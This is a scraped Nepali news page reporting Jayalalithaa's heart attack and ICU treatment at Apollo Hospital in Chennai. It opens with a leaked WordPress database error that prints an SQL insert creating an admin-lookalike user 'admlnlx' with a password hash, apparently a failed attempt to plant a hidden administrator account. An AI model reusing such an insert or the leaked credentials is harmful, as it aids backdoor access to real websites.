WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYwzgGYJOoJHP0SMptqMuzkJfzgxRs.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-08 00:04:11', '', 'admlnlx', 'admlnlx')
मंसिर २०-
तामिलनाडुकी मुख्यमन्त्री जयललितालाई हृदयघात भएको छ । उनको अवस्था गम्भीर रहेको बताइएको छ ।
आइतबार राति जयललितालाई हृदयघात भएसँगै चेन्नाइको अपोलो अस्पताको आइसीयूमा उपचार भइरहेको छ ।
जयललिता स्वास्थ्यमा समस्या आएपछि २२ सेप्टेम्बरदेखि अस्पतालमा उपचाररत थिइन् । चेन्नाइको अपोलो अस्पताल बाहिर उनका शुभेच्छुक र शुभचिन्तकको भिड लागको छ । र, सुरक्षा व्यवस्था कडा बनाइएको छ ।
तामिलनाडुका गभर्नरको कार्यभार समाल्न लागेका विद्यासागर राव रातिनै अस्पताल पुगे । जयललिताको मन्त्रीमण्डलका लगभग सबै सदस्य राति नै अस्पताल पुगेका छन् ।
अस्पतालका प्रवंन्धक संगीता रेड्डीले अस्पतालका डाक्टर मुख्यमन्त्रीको उपचारलाई विशेष ध्यानमा राखेर हरसंभव प्रयास गरिरहेको बताइन् ।